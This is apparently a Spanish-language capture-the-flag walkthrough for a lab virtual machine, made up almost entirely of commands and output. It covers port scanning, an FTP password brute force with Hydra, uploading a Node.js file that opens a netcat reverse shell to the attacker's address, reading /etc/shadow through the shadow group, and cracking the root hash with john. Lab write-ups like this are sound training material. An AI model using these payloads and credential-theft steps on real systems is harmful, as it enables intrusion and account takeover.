Identificamos la IP de la máquina víctima:
❯ arp-scan --interface=wlan0 --localnet | grep PCS | awk '{print $1}'
10.207.245.245Enumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 10.207.245.245
[sudo] contraseña para wh01s17:
Starting Nmap 7.98 ( https://nmap.org ) at 2025-11-08 18:47 -0300
Nmap scan report for 10.207.245.245
Host is up (0.00031s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
3000/tcp open ppp
MAC Address: 08:00:27:59:99:D4 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 1.34 seconds❯ nmap -sCV -p 21,3000 -oN 02-targeted.txt 10.207.245.245
Starting Nmap 7.98 ( https://nmap.org ) at 2025-11-08 18:48 -0300
Nmap scan report for 10.207.245.245
Host is up (0.00041s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
3000/tcp open http Node.js (Express middleware)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.20 secondsEl banner de FTP revela un nombre de usuario:
❯ ftp 10.207.245.245
Connected to 10.207.245.245.
220 "Hello a.clark, Welcome to your FTP server."
Name (10.207.245.245:wh01s17):Con el usuario a.clark, hacemos fuerza bruta contra FTP:
❯ hydra -l 'a.clark' -P ~/Documents/wordlists/rockyou.txt 10.207.245.245 ftp -t 64
...
[21][ftp] host: 10.207.245.245 login: a.clark password: dragon
...Nos logueamos por FTP; no hay archivos interesantes, pero comprobamos que tenemos permisos de escritura:
❯ ftp 10.207.245.245
Connected to 10.207.245.245.
220 "Hello a.clark, Welcome to your FTP server."
Name (10.207.245.245:wh01s17): a.clark
331 Please specify the password.
Password: dragon
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx 2 1000 1000 4096 Oct 13 14:38 .
drwxrwxrwx 2 1000 1000 4096 Oct 13 14:38 ..
226 Directory send OK.
ftp> put file.txt
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw------- 1 1000 1000 0 Nov 08 22:56 file.txt
226 Directory send OK.Como en el puerto 3000 corre un servidor Node.js que sirve este directorio, subimos una ruta .js maliciosa que ejecuta una reverse shell:
❯ cat pwned.js
const { exec } = require('child_process');
module.exports = (req, res) => {
exec('busybox nc 10.207.245.35 1234 -e /bin/bash', (error, stdout) => {
res.send(`${stdout.trim()}`);
});
};Accedemos a http://10.207.245.245:3000/pwned.js para disparar la shell como a.clark:
❯ ncat -nlvp 1234
Ncat: Version 7.98 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.207.245.245:45622.
script /dev/null -c bash
Script iniciado, el fichero de anotación de salida es '/dev/null'.
a.clark@lower7:~$Para escalar privilegios, revisamos los grupos del usuario y vemos que pertenece al grupo shadow:
a.clark@lower7:~$ id
uid=1000(a.clark) gid=1000(a.clark) grupos=1000(a.clark),42(shadow)El grupo shadow (Writable Critical Files Privesc) nos permite leer /etc/shadow; obtenemos el hash de root y lo crackeamos con john:
a.clark@lower7:~$ cat /etc/shadow | grep root
root:$y$j9T$9VFLJjKZix0Ugj9YsoOCS.$z0FVk.1CCNx/YRzEmwjcz6z4oYqa7YD6QyXd52jxyLD:20374:0:99999:7:::
❯ john -w=/home/wh01s17/Documents/wordlists/rockyou_utf8.txt hash_root
...
bassman (root)
...Nos autenticamos como root con la contraseña descubierta:
a.clark@lower7:~$ su root
Contraseña: bassman
root@lower7:/home/a.clark#Obtenemos la flag y fin.